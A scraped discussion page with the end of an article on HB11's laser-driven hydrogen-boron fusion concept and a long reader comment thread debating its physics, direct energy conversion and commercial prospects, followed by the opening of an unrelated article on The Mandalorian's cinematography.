Indeed, says Hora, experiments and simulations on the laser-triggered chain reaction are returning reaction rates a billion times higher than predicted. This cascading avalanche of reactions is an essential step toward the ultimate goal: reaping far more energy from the reaction than you put in. The extraordinary early results lead HB11 to believe the company 'stands a high chance of reaching the goal of net energy gain well ahead of other groups.'

"As we aren't trying to heat fuels to impossibly high temperatures, we are sidestepping all of the scientific challenges that have held fusion energy back for more than half a century," says Dr McKenzie. "This means our development roadmap will be much faster and cheaper than any other fusion approach. You know what's amazing? Heinrich is in his eighties. He called this in the 1970s, he said this would be possible. It's only possible now because these brand new lasers are capable of doing it. That, in my mind, is awesome.'

Dr McKenzie won't however, be drawn on how long it'll be before the hydrogen-boron reactor is a commercial reality. 'The timeline question is a tricky one,' he says. 'I don't want to be a laughing stock by promising we can deliver something in 10 years, and then not getting there. First step is setting up camp as a company and getting started. First milestone is demonstrating the reactions, which should be easy. Second milestone is getting enough reactions to demonstrate an energy gain by counting the amount of helium that comes out of a fuel pellet when we have those two lasers working together. That'll give us all the science we need to engineer a reactor. So the third milestone is bringing that all together and demonstrating a reactor concept that works.'

This is big-time stuff. Should cheap, clean, safe fusion energy really be achieved, it would be an extraordinary leap forward for humanity and a huge part of the answer for our future energy needs. And should it be achieved without insanely hot temperatures being involved, people would be even more comfortable having it close to their homes. We'll be keeping an eye on these guys.

Source: University of New South Wales




All Comments: [-] | anchor

eveningcoffee(4302) 4 days ago [-]

Cool thing about this is that it will be a direct energy capture if I understand it correctly.

'The hydrogen/boron fusion creates a couple of helium atoms,' he continues. 'They're naked heliums, they don't have electrons, so they have a positive charge. We just have to collect that charge. Essentially, the lack of electrons is a product of the reaction and it directly creates the current.'

javajosh(3916) 4 days ago [-]

Yes it seems like you could generate extreme levels of electrostatic force by collecting the Helium nuclei. Do that on one side of a capacitor, periodically short it out (producing ordinary Helium) to clear both plates, and repeat. So yeah a machine which takes hydrogen and boron and emits helium gas and electricity. Sounds like it's worth doing, at least for the sake of children's birthday parties.

hinkley(4219) 4 days ago [-]

This doesn't sound like it would be more energy-dense than a chemical reaction. How much power can you extract - electrically - from two alpha particles?

acidburnNSA(3665) 4 days ago [-]

Presumably the lasers have produced enough energy to ionize helium generated in the target. It's quite unclear how a net energy gain will be extracted simply by grabbing the moving ions electrically. That sounds like a huge extra challenge on top of achieving net positive controlled fusion.

There will inevitably be a lot of heat produced that has to be cooled. Generally people plan to use the coolant as the working fluid in the power cycle.

If there's an innovation here it'd be cool if they put it way more up front.

In any case there will still be a coolant.

andymoe(3975) 4 days ago [-]

So... what is their Current Q number?

"The fusion energy gain factor, usually expressed with the symbol Q, is the ratio of fusion power produced in a nuclear fusion reactor to the power required to maintain the plasma in steady state." [1]

[1] https://en.m.wikipedia.org/wiki/Fusion_energy_gain_factor

DennisP(3581) 4 days ago [-]

Currently zero, because the necessary lasers are just now becoming available.

In theory, they've got a kJ laser to generate the magnetic field, a 30kJ laser hitting the fuel, and a GJ energy output, for Q over 30,000 minus whatever losses you have in the lasers and electricity harvesting.

https://aip.scitation.org/doi/10.1016/j.mre.2017.05.001

sam(3646) 4 days ago [-]

If new fusion startups like this one are interesting to folks on this thread, here's a list of companies working on fusion energy that I've compiled:

https://www.fusionenergybase.com/organizations/

baddash(4031) 4 days ago [-]

thanks :D

Vinceo(10000) 4 days ago [-]

Thank you. Your site in general is a great resource on fusion.

DeusExMachina(1116) 4 days ago [-]

Can somebody with more understanding tell me if this idea I had is stupid or has some merit?

Fusion will deliver an incredible amount of energy, making it cheap. Everybody then turns up their energy consumption since it costs nothing. Raise heating in houses, use AC everywhere, longer showers, more transportation, etc.

All this energy eventually becomes heat. Can it get to a threshold where it can influence temperature on a global scale even if it lowers carbon emissions? What am I missing?

DennisP(3581) 4 days ago [-]

There's waste heat from our power plants today, but it's an extremely minor factor compared to carbon emissions. However, if we were to continue our current rate of exponential energy growth on this planet, we would boil the oceans in 400 years.

https://dothemath.ucsd.edu/2012/04/economist-meets-physicist...

On the other hand, compact fusion power would make for some great rockets, so by the time it's common it would probably make sense to move most of the growth off planet.

stjohnswarts(10000) 3 days ago [-]

You should be far more worried about CO2, methane and other greenhouse gases than worried about waste heart because that is just a drop in the ocean compared to greenhouse gas issues.

Vysero(10000) 4 days ago [-]

No the idea has no merit.

andys627(4016) 4 days ago [-]

Use free energy to sequester infinite carbon!

Tade0(10000) 4 days ago [-]

Orders of magnitude. Total Earth solar irradiance is in the order of hundreds of petawatts, while total world installed power plant capacity sits in at a few terawatts.

We're simply unable to measurably increase the amount of heat on the surface of Earth directly.

nnq(4136) 4 days ago [-]

> energy [...] costs nothing. Raise heating in houses, use AC everywhere, longer showers, more transportation

Yey, can we get to this future faster?! Joking aside, all the current eco-friendly tech diminishes comfort by a loooot... we need low-energy habitats that are actually comfortable ffs.

For example, traveling around Europe, I see that the new trend in the developed/western part is to shiver you ass out during the cold months and to melt your brains out during the hot ones in almost all public spaces! Like we're back in the pre-AC era! You need to get to Eastern Europe's bigger cities to enjoy comfy heating/cooling habits like proper heating in the winter (yes, I want my >25 C in winter!) and proper cooling in the summer (<18 C please!)... It's wasteful, but very much enjoyable! Snow fighting after/before coming out/in of a 30+ C heated house is bliss :D Same a blasting through an enjoyable heatwave after jumping out of a 15 C office and then back in. Life's little pleasures.

After we invest so much of our lives in developing technology, we should at least enjoy the simple comforts and pleasures it freaking offers!

jimbokun(4130) 4 days ago [-]

> the design is 'a largely empty metal sphere, where a modestly sized HB11 fuel pellet is held in the center, with apertures on different sides for the two lasers. One laser establishes the magnetic containment field for the plasma and the second laser triggers the 'avalanche' fusion chain reaction. The alpha particles generated by the reaction would create an electrical flow that can be channeled almost directly into an existing power grid with no need for a heat exchanger or steam turbine generator.'

> HB11 says its generators would be compact, clean and safe enough to build in urban environments.

Video: https://www.youtube.com/watch?v=OxEX8UueZ4U

galangalalgol(10000) 4 days ago [-]

How do alpha particles get turned into current on a line?

foreigner(4274) 4 days ago [-]

As a bonus it produces helium, which we've been running low on right? Break out the party balloons!

StavrosK(485) 4 days ago [-]

All fusion produces helium, though. I don't think anyone is looking into fusing heavier atoms.

Throwaway984332(10000) 4 days ago [-]

It's a bit weird to say we're running out of He, not unless we're running out of CH4. Which, theoretically we are.

But practically, with CH4, our modern concern is not running out of it, but the associated GHG emissions of producing and burning it.

So we won't run out of He, so much as stop producing it.

jl6(4302) 4 days ago [-]

> First milestone is demonstrating the reactions, which should be easy.

They haven't even demonstrated the reaction? What's all the talk about results being "billions" of times better than expected?

willis936(10000) 4 days ago [-]

As someone who works on a stellarator: no plasma experiment in fusion research is easy to do.

noselasd(4132) 4 days ago [-]

Simulations.

wefarrell(10000) 4 days ago [-]

Can someone explain why this is considered fusion? The reaction involves shooting a proton (hydrogen) at a boron nuclei and outputting 3 alpha particles. That seems more like the nuclei being split apart than fused together.

DennisP(3581) 4 days ago [-]

The explanation I've heard from a fusion scientist is that as far as they're concerned, if you're initiating the reaction by colliding nuclei, it's fusion, and if you're initiating it by hitting a large nucleus with a neutron, it's fission.

cstross(806) 4 days ago [-]

Start here: https://en.wikipedia.org/wiki/Aneutronic_fusion

(TLDR version: proton-boron fusion is a less energetically efficient alternative to 3He fusion, but with the howlingly significant advantage that boron -- the fuel -- is lying around in heaps and drifts on Earth, rather than being so exotic a substance that annual global production is measured in single-digit kilograms and a significant energy economy would require mining it from the Lunar regolith. It's not as well-known as 3He fusion, though, because the space cadets don't see the point -- there are no Moon colonies required. Advantages of 3He or B + p fusion over D-T fusion: it doesn't produce a surplus of neutrons, so there's less radioactive waste created as a by-product of the process.)

acidburnNSA(3665) 4 days ago [-]

I has to do with something called the Binding Energy Per Nucleon. If you march up the curve from small numbers to get energy you are fusion. If you march down the curve from high numbers, you are fission. If you march up the curve from small numbers and go all the way to large numbers even though that's endothermic, you are a supernova.

https://en.wikipedia.org/wiki/Nuclear_binding_energy#Nuclear...

ars(3157) 4 days ago [-]

Because you are fusing a proton to a boron.

After that there is radioactive decay (the splitting).

To be fission you have to actually [actively] break the atom apart, which isn't happening here.

tln(10000) 4 days ago [-]

It would be awesome to know what experiments they've done, or if this is all simulation

DennisP(3581) 4 days ago [-]

There have been experiments, but only at lower power than required for fusion. From their latest paper:

> A significant case of nonlinear deviation from classical linear physics was seen by the measurements, how the laser opened the door to the principle of nonlinearity and could be seen from the effect measured by Linlor [9] followed by others (see [7] p. 31) when irradiating solid targets with laser pulses of several ns duration. At less than one MW power, the pulses heated the target surface to dozens of thousand °C and the emitted ions had energies of few eV as expected in the usual way following classically. When the power of the nanosecond laser pulses was exceeding a significant threshold of few MW, the ions – suddenly – had thousand times higher energies. These keV ions were separated with linear increase on the ion charge indicating that there was not a thermal equilibrium process involved.

Lasers adequate for fusion are just now becoming available.

https://www.hb11.energy/news-and-publications

penetrarthur(4154) 4 days ago [-]

> and most rely on a deuterium-tritium thermonuclear fusion approach that requires the creation of ludicrously hot temperatures, much hotter than the surface of the Sun, at up to 15 million degrees Celsius (27 million degrees Fahrenheit).

Surface of the Sun - 6000 C

Center of the Sun - 15000000 C

dmos62(4140) 4 days ago [-]

It's not often that the child in me goes 'that's awesome!', but this is one of those times.

FredrikMeyer(10000) 4 days ago [-]

I think they might be thinking of the corona of the sun

> The temperature in the corona is more than a million degrees, surprisingly much hotter than the temperature at the Sun's surface which is around 5,500° C

https://scied.ucar.edu/solar-corona

andreiklochko(10000) 4 days ago [-]

To shed a different light on this: think of temperature as walking through mud. Your legs lose energy trying to slowly pull a lot of mud behind you. Now think about skiing. A lot less snow is dragged with you but it flies fast.

Here, what is interesting is if one fusion reaction does happen, then the alpha (helium) particles leave at 2.9 MeV. After two collisions with protons, if the second proton they have hit hits in turn a boron nucleus, then it will have exactly the right energy (612 keV) to have maximum chances at initiating a second fusion reaction.

612 keV is like almost 7 billion degrees °C if considered as thermal energy, and no experiment anywhere will get that hot for long. But compared to the energy of the exiting helium nuclei, it's still much lower (0.612 MeV vs 2.9 MeV).

In other words, instead of cascading all the energy down and hoping the sea of particles rises to a few billion degrees so enough particles do fusion to keep the sea of other particles hot, here, the energy is preempted by proton atoms after just 2 collisions and used immediately to start a second reaction, which yields more helium nuclei at 2.9 MeV, essentially producing an 'avalanche' effect.

Finally, yes, they seem to have devised a way to obtain at least a small part of the energy electrically, without relying on thermal energy, via direct electric field deceleration of very fast charged particles.

This is like 'the ultra rich (very fast particles) manage to create value among themselves without having to cascade their wealth down to the crowd (cold particles), and then upload that value to hyperspace (the electric field from the electrodes), without ever interacting with the mass of the crowd (the mass of the target), until a sufficient amount of fusion reactions have been realized'

The avalanche process is explained in Hora's 2016 publication, with a schematic page 9: https://aip.scitation.org/doi/10.1016/j.mre.2017.05.001

And yes, a petawatt (the energy of present day ultra-fast lasers) is a lot of power. It was just chance that there was very little practical use to this kind of power - until now.

That being said, I am not a true expert myself of this topic, so the true barriers laying in front of this concept might be better explained by the other comments here.

pas(10000) 4 days ago [-]

Is there any description of how the 'hit a capacity coil with a laser to generate a magnetic field' thing works?

https://www.cambridge.org/core/services/aop-cambridge-core/c... I found this overview a bit confusing and sort of low quality, but at least it references a lot of papers. (But haven't started hunting down any of them.)

UnFleshedOne(4289) 4 days ago [-]

'the ultra rich (very fast particles) manage to create value among themselves without having to cascade their wealth down to the crowd (cold particles), and then upload that value to hyperspace (the electric field from the electrodes), without ever interacting with the mass of the crowd (the mass of the target)'

Are you saying this kind of fusion is anti social justice? We should ban this immediately!

nkrisc(4311) 4 days ago [-]

> This is like 'the ultra rich (very fast particles) manage to create value among themselves without having to cascade their wealth down to the crowd (cold particles), and then upload that value to hyperspace (the electric field from the electrodes), without ever interacting with the mass of the crowd (the mass of the target), until a sufficient amount of fusion reactions have been realized'

This was actually a helpful analogy for me. I'll have to take your word on the accuracy of it, though.

pfdietz(10000) 4 days ago [-]

I am very skeptical of this approach.

The big problem I have is the direct conversion approach being suggested. The idea, as I understand it, was that the target is placed at the center of a large sphere, and is negatively charged, so the alpha particles from fusion slow down as they go up the potential to the surrounding spherical collector.

You see the problem with this, I hope. The violent and energetic event at the target will produce gas and plasma, and lots of free electrons. What is stopping that from shorting out this megavolt vacuum capacitor?

jabl(10000) 3 days ago [-]

The direct conversion stuff doesn't seem that critical. If that doesn't work out immediately, surely the first generation can use good old steam rankine power conversion (or sCO2 Brayton, if that is deemed mature enough).

My worry is whether the specific fusion reactor concept itself is viable.

acidburnNSA(3665) 4 days ago [-]

Always happy to see people doing new and interesting stuff with fusion. I got into nuclear technology because of ITER back in the early 2000s. Worked on it continuously (mostly in advanced fission) ever since.

> 'The timeline question is a tricky one,' he says. 'I don't want to be a laughing stock by promising we can deliver something in 10 years, and then not getting there. First step is setting up camp as a company and getting started. First milestone is demonstrating the reactions, which should be easy. Second milestone is getting enough reactions to demonstrate an energy gain by counting the amount of helium that comes out of a fuel pellet when we have those two lasers working together. That'll give us all the science we need to engineer a reactor. So the third milestone is bringing that all together and demonstrating a reactor concept that works.'

The fourth step is to deliver the reactor concept as promising machine. The fifth step is to attach it to power generating equipment and demonstrate the power plant. The sixth step is to scale up a supply chain capable of delivering multiple units that compete with other sources of commodity electricity (or other energy products). The seventh step is to scale to large scale without being unduly burdened by either supply chain (raw material, skilled labor) or regulatory impact/public concern that inevitably scales with any large fleet of any new tech.

Fission made it to step 7 and then faltered and is now teetering depending on where you look. It never scaled past 5% of total world primary energy.

The promise of fusion is to deliver nuclear energy with less public concern than fission because it makes less radiologically hazardous material. The challenge is to go through the physical, engineering, and commercial viability phases as a power plant.

Accujack(10000) 4 days ago [-]

Love the user name. I always thought that movie was amusing, and so is the NSA :)

anonuser123456(10000) 4 days ago [-]

>I got into nuclear technology because of ITER back in the early 2000s. Worked on it continuously (mostly in advanced fission) ever since.

What is your opinion on SPARC and tokamak energy?

sf_rob(10000) 4 days ago [-]

Tangent, but assuming fusion energy generation will be a reality in the next 30 years, what do you believe the price/KWH will be? I am not knowledgeable enough to parse the estimates I've seen and want to believe in the post-energy-scarcity future.

1024core(4313) 4 days ago [-]

Apparently Step 5 is not needed?

> The alpha particles generated by the reaction would create an electrical flow that can be channeled almost directly into an existing power grid with no need for a heat exchanger or steam turbine generator.'

dfsegoat(3842) 4 days ago [-]

FWIW as an aside: I always scan comments on nuke-related HN posts to find yours first. Super informative and easy to digest. Thanks again.

ccleve(4283) 4 days ago [-]

A number of these steps become easier if the reactor is physically small. A plant that fits in a shipping container has a way easier path to commercial viability.

Small plants require less capital. They're easier to manufacture. They can iterate faster. They have less environmental impact, and therefore fewer regulatory hurdles. They require less labor to build and a smaller supply chain.

I expect that the engineering is harder, because scale can bring efficiencies. But still, I think the winner is going to be a small device, not a behemoth, if only because a small device can come online years earlier.

naiveprogrammer(10000) 4 days ago [-]

I don't know whether this is a legit breakthrouhg. But technological progress is often a sigmoid (S-shaped) growth curve, it may take a while to get past certain steps but once you are through, money flows and more people devote time to that technology which accelerates the process. It is not hard to imagine, say, 20 years from now, we have power plants running on fusion given the interest we have in solving the climate crisis.

wtracy(3624) 4 days ago [-]

> The fifth step is to attach it to power generating equipment

The part that jumped out at me as strange is that they claim their process generates electricity 'directly' without having to drive a turbine. Supposedly they produce helium cations, and that can drive a circuit.

Can anybody comment on whether that makes sense?

ChuckMcM(537) 4 days ago [-]

Spot on analysis. There is one loophole which is Total Cost of Ownership (TCO).

If you energy production solution can achieve a lower TCO in an existing market segment, steps six and seven (production and supply chain) take care of themselves. The poster child for this was 'on premise PV generation.'

Once a nuclear technology demonstrates a lower TCO for baseline power generation, its game on.

tinco(4196) 4 days ago [-]

Off-topic question: is there some software part in nuclear energy systems that is restricting plants or research? I'd like to contribute to the industry as a non-physicist, but it's hard for me to imagine what kind of software might be missing or is being sold by too expensive specialist companies.

I imagine most software is tied to the specific devices they run on, but perhaps there's coupling or analytical software that could be better geared towards the problem domain. Is there any fundamental issue that is waiting for a good software solution?

throwaway010718(10000) 4 days ago [-]

> because it makes less radiologically hazardous material

Why is there any radioactive material produced by a fusion reactor ?

JoeAltmaier(10000) 4 days ago [-]

Why a pellet? Why not a gas of boron and hydrogen? Easier to feed continuously.

grogers(4192) 3 days ago [-]

The paper says the fuel is a low energy plasma of 'solid state density'. It's not a solid chunk of HB11, which AFAIK doesn't exist. The primary factor limiting the feed is the repetition rate of the laser.

kamesstory(10000) 4 days ago [-]

Probably had to do with density, if the target is cascading reactions by nuclei to nuclei contact. Solids have a higher chance of contact.

tartoran(1883) 4 days ago [-]

This proves once again what could happen if one is not to follow the herd.

melling(1183) 4 days ago [-]

"He called this in the 70s, he said this would be possible. It's only possible now because these brand new lasers are capable of doing it."

He knew it would work 50 years ago.

I imagine there are ideas being discussed today that will come to fruition 50 years from now.

... or 30 years. Our choice.

wokkel(10000) 4 days ago [-]

What i find disturbing is when I start looking for other sources, google gives me a news item on https://newsroom.unsw.edu.au/news/science-tech/pioneering-te... but there the article has been retracted? Also another one that is behind a paywall it seems (cannot tell as the paywall is broken). So I have 1 story on 1 website and the company website itself. The news-site claims on their about page that they value old-school journalistic values (I assume they mean, they investigate a story before publishing) but it's hard to take that claim seriously without more credible sources. For me this is interesting technology to keep an eye on, but without more confirmation and research, this is cold-fusion for now.

DennisP(3581) 4 days ago [-]

For the credible sources look at their publications in scientific journals. They might be wrong but this is nothing like cold fusion.

yufeng66(10000) 4 days ago [-]

There is a warning sign. Without actually running the number, I believe the energy generated by the proposed HB11 fusion should be several order of magnitude higher compared to the electric energy alpha particle can carry. So extreme hot temperature will be created regardless.

Edit: actually read the paper :) From the paper: H + 11B = 3 x 4He + 8.7 MeV

when alpha particle absorb the electron to become helium, it can carry about 50 eV energy. So vast majority of the energy generated will be kinetic energy or photon energy which translate into very hot temperature at macro level.

steerablesafe(10000) 4 days ago [-]

I think the idea is to capture the kinetic energy of the Helium ions not through cooling but slowing them down with electromagnets. The high-speed Helium ions carry a large current, it's not about the ionization energy.

bbojan(10000) 4 days ago [-]

Actually, converting kinetic energy of fast moving ions to electricity is a very efficient process. See https://en.wikipedia.org/wiki/Direct_energy_conversion.

danmaz74(2552) 4 days ago [-]

I suppose the idea is that most of the energy will be expelled as kinetic energy of the alpha particles, that then can be converted into electric potential energy?

phkahler(4177) 4 days ago [-]

Yeah, I thought the electrical output seemed fishy too. Why are the electrons stripped from the helium? And is that actually due to the energy of the fusion reaction? And how much of the fusion energy is left after?

These are IMO the fundamental questions.

skykooler(10000) 4 days ago [-]

Much of the difficulty with fusion is getting the fuel to the temperatures needed to sustain fusion - so that's actually a good thing.

londons_explore(4296) 4 days ago [-]

The whole 'electrical energy directly so no steam generators necessary' part of the discussion is fairly irrelevant.

Steam generators might have fairly low efficiency, but if hydrogen fusion works at all it'll use so little fuel and have such a low marginal cost that we can just do more of it to make up for any efficiency losses.

TomMarius(10000) 4 days ago [-]

My nuclear fusion physicist friend is very sceptical.

throwaway9d0291(10000) 4 days ago [-]

On its own, this isn't a very substantial comment. Can you elaborate on why your friend is sceptical and what effort they put in to come to that conclusion?

crusso(10000) 4 days ago [-]

Here's a video explaining the reaction: https://www.youtube.com/watch?v=Dy0kHQASsX8

dctoedt(422) 4 days ago [-]

Upvoted — the first minute or so of the video is very helpful; it shows (what looks like) PowerPoint slides with drawings of a proton (1H nucleus) hitting a boron nucleus (5B11); the proton fuses into the boron nucleus to create what presumably is a single carbon nucleus (6C12), which then splits into three helium nuclei (each 2He4) without emitting free neutrons.

(The very-crude video technique was fascinating to this non-artistic person: Create PowerPoint slides, add subtitles for 'narration' that float in and out, and finally add stock music for background. That might be useful for flipped-classroom courses.)

pier25(2674) 4 days ago [-]

Is fusion capable of replacing all our energy systems?

If it works, is it the energy miracle humanity needs?

LaMarseillaise(10000) 4 days ago [-]

1. Yes.

2. No, because we already have fission reactors. How many miracles do we need?

acidburnNSA(3665) 4 days ago [-]

There certainly is enough fusion fuel on earth to power humanity at 10 or 100x current consumption until the sun explodes without emitting any CO2.

Same can be said for fission, but it only powers 5% of the world due to what can be called complications (even though many scientists insist that it's safe and responsible).

Fusion is expected to have fewer complications, but we won't know until we scale up a fleet of fusion power plants and understand all the nuance.

How's that for an answer?

1958325146(10000) 4 days ago [-]

I am just learning about this reaction, but can anyone explain what is wrong with the following naive idea?

- Fire a stream of hydrogen ions with a particle accelerator at a chunk of Boron 11. - The hydrogen and boron combine and release heat and helium. - Use the heat from that to run a turbine and keep running your particle accelerator.

It seems like you would be ending up with lower-energy collection of atoms. Does that work but it is just not efficient enough to keep running the accelerator, or what?

Accujack(10000) 4 days ago [-]

>fire a stream of hydrogen ions with a particle accelerator at a chunk of Boron 11.

This is what's wrong. The energy required to accelerate the ions is much higher than the energy which can be harvested this way.

The concept under discussion substitutes a simpler setup that accelerates particles using laser induced plasmas from a very small table top laser. The thing could 'almost' be battery powered.

sam(3646) 4 days ago [-]

The problem with firing a stream of hydrogen ions at a chunk of Boron 11 is that most of the collisions between the hydrogen and the Boron are glancing blows that will dissipate the energy very quickly. Only a small fraction of the collisions result in a fusion reaction.

This is the reason why most fusion approaches rely on thermal systems. In a thermal system, the ions have a bell-shaped distribution of energies and undergo many collisions before they leave the region in which they are confined and their energy leaves the system.

To achieve net gain, the temperature, density and energy confinement time must be above a certain threshold. If the system is non thermal, like a stream of hydrogen ions where the distribution of energies is a spike, the energy in the hydrogen ions that are deflected by glancing blows must be recaptured somehow.

willis936(10000) 4 days ago [-]

27 comments and not one hit of the word "inertial"! The line about not being thermonuclear and the description of the device in question (a sphere with lasers) points towards an inertial confinement fusion (ICF) device. Most of the fusion research eggs are in the thermonuclear basket, specifically magnetic confinement fusion. It is good to research a diverse set of approaches, but there are more engineering challenges to ICF reactors than there are to MCF reactors. Pulses on the order of 1-2 Hz requires a mechanical system that can cycle out the exhaust and replace the pellet in that time. Going to reactor scales also requires high load thermal cycles. MCF ain't easy, and brings it's own engineering challenges. The ones I always hear are things like wall materials and fuel recycling, but these are largely solved or in the process of being solved. The engineering challenge I see as the most difficult for MCF are related to steady state operation. Tokamaks have no way of being steady state. Stellarators do, but now the next problem is wall conditioning. Wall materials outgas in hot plasma. A lot. Like more than the fuel puffed in. The way this is handled in science machines is with glow discharges of various species: plasma just below the temperature to cause wall sputtering, coating the wall with carbon and boron for their absorptive properties, etc. No one's run a steady state hot plasma before, so no one knows if these will be a non issue in reactors. Keeping the plasma clean may be a challenge to keep the plasma from terminating. Aside from that MCF is ready for prime time. It needs a big reactor for scaling laws to make it energy profitable (and potentially money profitable). We just need some very expensive test reactors to smooth out these issues.

derefr(3783) 4 days ago [-]

Complete layman to this, but are these approaches fundamentally incompatible with one-another, or is it just that each one on its own seems to be "enough" to get a reactor to work? Could you have a reactor that just combines all these confinement approaches at once?

pxhb(10000) 4 days ago [-]

One reason you might not find 'inertial' is because the only thing they have in common is a laser.

For ICF, a long-pulse laser is used like a hammer to heat and compress the material to fusion conditions.

This scheme, as far as I can tell, uses the large EM fields of a short-pulse laser to accelerate a 'beam' of ions into cold material to induce fusion.

anonsivalley652(4125) 4 days ago [-]

It seems easy to conflate any or all approaches as fringe when no one's done it yet, and especially if there are political and program-$ecurity concerns overriding doing what's best, but some approaches scream magical thinking with unexplained reasoning more than others (like one or more cold fusion proposals in the early 1980's). OTOH, it seems like ICF and tokamak are the officially-sanctioned dogma and all other approaches are discounted automatically.

Q0: Without bias from my opinion, how fringe or potentially legitimate does IEC seem?

Q1: Props to the article's team that they invented some awesome lasers. Is there enough experimental data yet on their novel approach to backup their claims to justify funding a prototype? Would such a team be able to test this on a shoestring budget without spending millions?

LargoLasskhyfv(10000) 3 days ago [-]

As an absolute dummie I had to think of ASML where they repeatedly hit molten tin droplets in flight with CO2-lasers, to produce some plasma, to get extreme ultraviolet light out of it. 50.000 times per second. So the part to hit something very small in flight, in a vacuum, precisely and repeatedly exists on an industrial scale already. Though not simple, small and cheap. Should ask Cymer or Trumpf who do this. And forget about all that unnecessary light generating stuff, just ripping out the necessary parts and adapt for their application. And of course harden it against the FUSION happening. Simple, isn't it?

(stupid grin)

Dumblydorr(10000) 4 days ago [-]

Just a writing critique. I think your post could use paragraph breaks, it's hard to discern the logical structure without breaks.

missosoup(4187) 4 days ago [-]

So is there a way to invest in this?

DennisP(3581) 4 days ago [-]

It's a private company in Australia that likely needs more funding, so probably so, if you meet your government's requirements for investing in that sort of thing.

RandomWorker(4302) 4 days ago [-]

Google polywell the US military has been funding this for the past 20 years. There are some issues that might be solved with scaling the device. A company called emc2 was spun off this US military project.

DennisP(3581) 4 days ago [-]

Polywell is a completely different method.

cfv(4320) 4 days ago [-]

On paper, this sounds absolutely awesome and a huge game changer.

I'm super concerned about the military applications tho. Giving functionally endless, mostly free power to warmonger countries with the ability to field drones is something extremely concerning for me.

foobiekr(10000) 4 days ago [-]

they basically already have endless, mostly free power in the sense you are getting at. that it isn't clean is irrelevant to their use case.

china, iran, the united states, etc. militaries are not hurting for energy and already make heavy use of small nuclear reactors where just hauling fuel is not an easier choice.

detritus(10000) 4 days ago [-]

This seems.. too good to be true?

I don't have the Physics chops to untangle the likelihood of this tech and the credibility of the process and its authors, so I'm hoping the HN crowd will be able to pad out the story behind this.

Certainly, from my layperson's perspective, their website isn't exactly encouraging... https://www.hb11.energy/

- ed re: last line - 'books and covers, and all that'

saagarjha(10000) 4 days ago [-]

Not a physicist, but I thought it seemed fishy as well. I'm curious how they plan to sustain a reaction, since their setup didn't seem to be useful for more than a single shot...

superkuh(4122) 4 days ago [-]

After reading the article and skimming some of the innumberable references (the article is all references) it seems like the unobtanium part of using laser pondermotive force to accelerate blocks high density plasma from solid state is that the laser 'contrast ratio' has to be very high. In the paper it cites many failed replication efforts to use this particular laser pondermotive force due to lack of 'contrast ratio'.

I have no idea what 'contrast ratio' means, it isn't defined, and isn't in the references. Does anyone know what 'contrast ratio' means in terms of high power pulsed lasers?

edit: To answer my own question, ref: https://cdn.intechweb.org/pdfs/24813.pdf

> the laser pulse contrast ratio (LPCR) is a crucial parameter to take into consideration. Considering the laser pulse intensity temporal profile, the LPCR is the ratio between its maximum (peak intensity) and any fixed delay before it. A low contrast ratio can greatly modify the dynamics of energy coupling between the laser pulse and the initial target by producing a pre-plasma that can change the interaction mechanism.

It seems to be how fast the laser turns on, the rate of change of intensity.

randallsquared(3822) 4 days ago [-]

The Hydrogen Boron reaction is real and well-known to be a way to do fusion without lots of stray neutrons. The sticking point has always been that it's more difficult to cause that reaction than deuterium/tritium or deuterium/deuterium.

DennisP(3581) 4 days ago [-]

Check the publications page for the encouraging part. They might be wrong but they're doing real science. I've personally spoken to a fusion scientist who thought they might be on to something.

Exponential progress does sometimes have results that seem too good to be true. In this case the progress has been in picosecond lasers, which for a while have been getting ten times more powerful every three years or so.

What's great about this is it should be pretty cheap to test. The petawatt lasers only cost tens of millions in the first place, and China is finishing up a 30PW laser which they plan to let other researchers use. If Hora is right then that should be powerful enough. Even more powerful lasers are being planned elsewhere.

HB11 isn't the only company working on aneutronic fusion. The largest is TAE (formerly Tri Alpha), with about $700 million invested. There's also Helion and LPP.

moneytide1(10000) 4 days ago [-]

Yeah I've become wary of 'scientific breakthrough' articles that never seem to materialize into anything.

But ITER uses huge tower cranes and trucks in the thousands of tons of material required to sustain a temperature hotter than the surface of Sol because of their fuel selection.

It seems the small player with a new approach that perhaps demands less complexity in their scaled up commercial reactor could win a commissioning contract with a lower bid during late 2020s early 2030s international bidding.

'First milestone is demonstrating the reactions, which should be easy.'

And 'chirped pulse laser amplification' is the recent discovery Hora says will make it possible.

Accujack(10000) 4 days ago [-]

Do a google search for 'laser induced fission'. Generating plasmas with CPA lasers is becoming more common, but isn't widespread yet because the technology is very new.

These plasmas can be the source for all kinds of particles and energy in particular forms, so they may have lots and lots of uses.

One person in particular is proposing to use a CPA laser to accelerate nuclear decay, to allow radioactive waste to decay faster and become less toxic more quickly.

Of course, my own concern would be that being able to induce fission with a table top laser means that the tech may eventually exist to create a fission or fusion bomb without a nuclear trigger....

jabl(10000) 4 days ago [-]

The big problem with H-B11 and other heavier fusion processes is that the energy radiated away as brehmsstrahlung is greater that the energy gain from the fusion. This was worked out by Todd Rider in his 1995 PhD thesis.

Yeah, in theory it might be possible to capture the brehmsstrahlung and pump it back into the reactor with sufficiently high efficiency, but we're pretty far away from that.

That being said, all these fancy fusion reactor schemes are interesting. Just make them work on boring old D-T fuel first, then lets see if these other fuels are usable, no?

moron4hire(3507) 4 days ago [-]

I don't know. I think a really flashy website would be more concerning. This is a serviceable website that gets it's point across without consuming a gig of bandwidth on a video in the header background.

pxhb(10000) 4 days ago [-]

I can't tell for sure from the article but I think they are accelerating protons with TNSA (target normal sheath acceleration). I worked in a lab in undergrad that was doing something similar, except with lithium instead of boron. The main challenges that I recall from a decade ago with TNSA are (WARNING: there almost certainly has been progress since a decade ago):

-Conversion efficiency of laser energy into ion (proton) kinetic energy

-TNSA accelerates mainly the contaminated layer on the back of targets, which may not be a big deal if you are interested in accelerating protons

-TNSA protons are not beam like. They do not have a uniform kinetic energy, and they have a wide angular divergence.

-Various laser related issues (prepulse, focal spot size/shape).

I also anticipate that it will have the same engineering problem as ICF/NIF, in that it will need to continuously replenish targets.





Historical Discussions: Real-time, in-camera background compositing in The Mandalorian (February 20, 2020: 753 points)
Virtual Cinematography for the Mandalorian, Using Unreal (February 09, 2020: 1 points)

(753) Real-time, in-camera background compositing in The Mandalorian

753 points 5 days ago by ashin in 4119th position

ascmag.com | Estimated reading time – 44 minutes | comments | anchor

Cinematographers Greig Fraser, ASC, ACS and Barry "Baz" Idoine and showrunner Jon Favreau employ new technologies to frame the Disney Plus Star Wars series.

Unit photography by François Duhamel, SMPSP, and Melinda Sue Gordon, SMPSP, courtesy of Lucasfilm, Ltd.

At top, the Mandalorian Bounty Hunter (played by played by Pedro Pascal) rescues the Child — popularly described as 'baby Yoda.'

